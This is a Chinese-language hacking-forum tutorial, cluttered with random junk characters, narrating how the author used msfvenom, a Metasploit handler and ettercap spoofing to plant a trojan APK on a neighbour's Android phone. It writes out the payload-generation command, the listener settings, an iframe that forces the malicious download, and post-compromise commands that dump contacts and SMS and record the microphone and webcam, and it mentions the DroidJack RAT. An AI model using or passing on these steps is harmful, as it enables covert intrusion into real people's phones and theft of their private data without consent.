9 T4 G" w6 {& |; ]* y" f$ S
五、msf+ettercap入侵邻居安卓手机
$ P3 v' c! G( o% q' \1 | {/ k" C5 i- M/ {- j7 r7 R$ b6 c/ ]
/ [& _2 ^3 t8 v/ ]! C- u- n" g3 r
首先启动msf
; Z5 M3 _: N( X' o3 D " E: X- n5 a9 d1 R' i9 v
7 v/ o, n2 W$ r4 s" T# Z/ q# P& d 先用kali生成一个安卓木马,如下命令:
{# {: v( m0 G% s1 P J Q9 Y # `, p6 C4 c8 V6 q. @% b U
( U M; ~ n* M; A2 D% D q# B" Y Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 0 N& S/ i D4 E/ t) D B
# v: p4 F2 [- _; l- ?' W/ }0 [" ]; Z' P5 R
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
; y4 B- U* ^# }; m
' v% H7 _% n, N) I, y/ ]! B+ t; N/ C4 r0 `' m3 X) @" j
然后进入msf 8 ]/ X! Q- Z0 J: M* [
, R3 s" S4 D, M- M9 W$ y U$ T0 @) R% I4 _* e3 T
use exploit/multi/handler
. i8 I2 G- r, e) _4 V$ ? 7 B) T: w) K1 _( O! m8 e8 w- K
, R5 x' ]# R& Z5 _7 c4 n
set payload android/meterpreter/reverse_tcp
/ O; R; \2 b+ l5 D( w" u0 V 2 Z& R' P" v2 G5 y
- V2 W0 B# A! N( s' ] set LHOST 192.168.0.109 //ip为kaili的ip 0 L" d2 a9 f5 {2 m; B
0 H" E) Y2 D/ N+ Z% j- `* h
i5 b' m! }+ O- G* y- j
set LPORT 44444 //端口一定要与前面生成的木马的端口一致 - S5 b; A. B+ L% c; f
, ?! [1 Q2 |0 \* O- c; V) X. q# l7 P5 ]3 }8 l/ u! h% {; B
Exploit 9 B1 L' K3 c! B, Y# j" ~/ m
) a! H# q8 U8 s2 k8 Q) P0 o% h* z! Y8 N, N7 y1 t- g
# W6 j7 H, h1 n
3 V; |% G& f7 I" ?
- R0 Z: E* W' ~1 D5 [ 下面我们开启ettercap -G " N( o# e Z4 H6 h
, s/ ]! j% V3 C% t0 a4 `
3 e& o8 |; i/ b3 V" G$ @9 L
我物理IP为
" N0 E+ M2 u; _/ `- [, V1 K) \
6 ~% U6 Y# U% ~" u! w% O/ r* U& d$ T9 \# w0 J
/ r. N) ?5 w. b/ F5 A. M; `$ d
; A7 X9 ]8 a8 \. z- M. Z* S9 l5 l7 a b: K! u
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 0 B3 c6 C. i( G6 y9 t, |+ h6 M. O- H
' C. ~9 @, l* `) C8 G* L' o# {
& Q8 F+ _. M" L- }, B! \7 A6 u$ g 下面我们来设置一下
* X, ^8 L) C/ L3 V ! F4 f8 c6 ~( C
2 U0 Z7 F0 ^7 [# k; P ! u2 N; L' @; h4 a, W8 e2 o( c
6 E5 L# q' ?, p0 x! T" N4 e1 @% t3 a0 j W: E; @* |3 J
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, - f" y2 ~, }$ `, [( G: M) {1 q
- _4 Q% A( f& j6 I" P7 U3 X, t1 u
0 S9 y9 e: e( z; `6 ^
" c; y# N$ K1 K$ J
* g2 S t3 v& p( A/ M/ v& {& Z" Y; U' \ G( I* l6 X
) r. V; x$ |7 I
K/ m5 t1 I5 {& p& A+ Y( Q; B
5 \6 n0 g7 l; {, S , |2 U C/ j* ]( k* E p& v
( v! D$ l9 c5 l4 Z1 `% x
* c/ x% o6 q5 y) h# X
; l6 R0 _/ n" v+ c0 f; U
) {0 U* u( j5 H% ~6 ?. ^9 `8 k( M6 j5 }
$ f, l" l$ O3 x' I/ U3 K, Q
( c- \% X( P- @! V1 A7 a: `6 V: p0 V' ]. M- M7 p
+ x" v: k! `- }- S
! r1 m2 V' K0 Z' w
% q y' U4 z3 m' J R & |- q! W& x0 d8 x s4 ?
: t7 i, w8 l# t S' F9 t7 T
; U1 f& m. ^9 S9 j0 q
) \5 O9 l4 z; O3 e5 J6 l
1 k, [1 a0 }- `* d3 Q5 c
+ f7 I) Q& j* w9 Y& e* }% d9 x3 {- v
) X4 B5 x& B5 d( B5 c
; q! t% U$ {! s, [" O, F, h* a- @( k
- `& k& y4 E4 X+ \# I Z
9 y/ _4 w- s; L! R
+ C5 Q& _3 s( ~ - b- `3 g6 x( \: ?3 L
% Y: E/ T+ h& ^" c& l) k
" y4 O b! w3 r s7 j
! i+ V5 c1 k& o, c
1 x3 T; {1 Q/ H% ~' \2 C x
3 W# f/ {% X9 a7 a6 i 3 l# E! E, ~. u2 K$ b+ h
3 t+ ]/ S* n5 I) H1 [) |, l
4 t7 z6 ?/ S2 G7 m& X
下面我们开始攻击
5 ?8 `( X3 x3 r, M( W, z, b0 P . s5 j6 ^/ U( n3 r$ W
$ X3 n. Y. w* P ) d U: R, u- i& S6 \
. N+ t2 Z3 y1 B' h4 O
) ~8 O9 y) J3 H; n" S
/ T8 |+ Z& D0 E# \2 d$ T" f" b! |+ f; ` 8 ?5 C i1 t8 \3 `1 g& P% C
M2 d H. k5 K F3 W
. p- M6 T1 [" H, B 1 c8 g# @% H/ r9 e# X+ f
/ b! q$ e$ R' Q
0 w4 \3 }! E0 j& B. p7 ~' J. v
: d4 u; \# f2 X: P f3 v) B. z
* ^$ |9 k3 {' i' } - N7 t) L4 G9 r8 a8 P
4 h( a: e9 P, ~& [/ @ K& ~
* B) H. v" F$ y 大概过了5分钟多,发现反弹成功了
( C# d9 n% ~% i" ~
; c9 S9 N' F6 a$ e1 ?* U. c" D4 z. R# X! c n M
4 L4 x$ D" v6 \' n ' @7 D" f6 E+ p, A% J! B; q1 I
\3 x0 F: d$ o1 M4 \. A
$ z% N+ H$ G$ @1 T; B! G 0 c- H6 A4 D" N5 B; |
" s- z8 i6 i0 N! e0 v* m+ C/ m & ^2 w3 W" j9 P5 N% {
$ x) _% R+ o& p$ I
# G/ R9 u" J- [! h
! y' f. _% p& y' B
4 y) Y# |0 O1 R2 |
) J) o% B. Q; B/ L- o
- o+ \1 V9 ~6 B8 k7 k3 n 7 ? t6 @: F4 y
9 b* \1 \3 Y6 T2 _: J) Y9 n' C2 R
+ B& S& I q& [1 f" s8 @ 7 g. o, a% K, q; u
# |0 h. y& }% ?# p# [- _
0 T" D. j: H* K0 z0 o( V. Y
$ q( @) U1 d+ V9 s
2 M( `% L0 T% k( ?# L. p 执行命令
* u4 M7 b+ |' ]
9 R4 Y# m$ o. f- N& L
) @7 _' {$ Y5 D5 E. @
0 ]0 l) S3 y/ D& [
% s8 e9 d) f4 u( }+ y1 L' X% b$ y" Y+ M
dump_contacts --》这个是导出电话 # W* m) G8 y) ~+ _5 d$ E
$ r+ X- v" \0 V9 r7 C) Z6 m; t2 N# s" z% K. }
dump_sms --》这个是导出信息 7 r: E# ^: E2 j+ f& y6 r
2 k7 N. c- O$ O- l9 o7 ^ V3 n. K+ g6 y6 R
record_mic Record audio from the default microphone for X seconds
& K9 r5 K, r3 Y% f- `- c8 w 3 O+ Z! z9 F4 e8 S' X
( C3 S2 }; g _- e
webcam_chat Start a video chat ) Q# \# g7 M" W8 ~9 r
3 @# ?/ [9 u% B( q6 X$ }
% I# d( k+ ]2 Y) C1 G
webcam_list List webcams
: q. t' E( F3 W; T9 K# m u, z0 F
Z" y q2 K+ G5 c4 W- i6 L* r. L; c0 e5 z; v; C6 P6 ~
webcam_snap Take a snapshot from the specified webcam
# p( ]6 L6 u# x' V
+ g) s7 J$ w) Q( t+ r# z! x" ~& c0 _' y
webcam_stream  lay a video stream from the specified webcam
( t6 [1 t9 ?( G4 {; e
8 t: u& C5 \- \/ ~5 J" ?+ w# e8 y
& v- R" ~% e& g4 c0 i2 A3 Y% f/ l7 ?
# v4 l ?9 X& Q8 t; I7 n; Z7 o % C& }' r( v* d1 H0 o# e# H
# V5 r0 e5 d" ?7 v8 O % L7 y4 K6 H' C) ?; {
$ a) }' l2 q0 G1 h' ?1 Q( n+ g
! D9 Y; @' n5 g w; } 我们打开看一下电话薄,
. Q6 z+ J: h2 r6 k ) p: k3 @. E& @9 m
% Z0 B1 v) o) L
, n5 r! ~4 W( C. C% h/ r/ ~
9 G6 @# v$ _" t. o+ k- T' G$ K
7 t3 O! G" l& V ( B" U1 ~' `. A6 Z* `0 A
+ J; P- D4 V9 A/ M, f
( f0 T8 P/ G/ n M - |$ ]; C( [+ H" Z. U* s
3 Z! X& ^- K6 q# E) k: p- r, `# e* l. W7 L' C. |
1 |2 {6 [9 M1 |5 H! u9 ^ ' W# Y" E, P% s! c
8 B3 |$ l' z, A' I6 Z- d( j
, M' y f4 J: r- \6 G1 `
9 D& n) Q' {9 ?0 k$ _8 P* ^, [2 ?! Z1 O! o3 c
: b' Q" T- G& \4 T; s
- @- N: s3 I2 t4 t' k: B- `/ {# @4 E U$ l" R+ E
我们同时欺骗成DroidJack木马,使用方法如图: $ L, w6 u, |: G8 \5 g# Q9 y7 V
5 y; [+ ` u, ~. f' w7 V" R
9 C' s) f0 r: o# c) Q& ?
* U0 j E0 O& o7 A- G
& P$ K1 ~& @8 x! H2 t( ?3 e3 C
" H6 i# B& n7 @" j R! V1 k
/ O2 i2 m2 M- N
8 E2 Q$ |8 w4 c! x
% o+ b O# b! F" P+ Y5 R
% t# l! U; q! L: B# {/ F . ]3 Y/ e# z$ ?1 C0 _# k
5 L# j7 v' U9 d: }: q
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 3 {( w5 \% o4 z' P5 a2 C6 q. K
9 y6 G4 z5 K: T/ N
0 O+ h( m5 H% c& @7 {) r
" D# t. h3 J- N. {8 o; q0 o
1 k! f8 E! ~4 d \; A
. Z6 T7 f4 i* j) V / ^2 ]/ b3 Y& `8 t% g1 `8 m' n4 ?
2 z8 n0 j% V' }
5 Z0 E8 O5 k/ q 4 J. y, v. U6 U
1 ~+ q( H3 q( l4 v2 Q5 J% T& F+ q5 T
1 z( M: {9 f, N" m
5 t$ p& O) D/ {3 Y4 w
, t1 S, P$ i$ g/ k' l " U6 b4 e& w8 N0 Q! M) m8 p$ A
|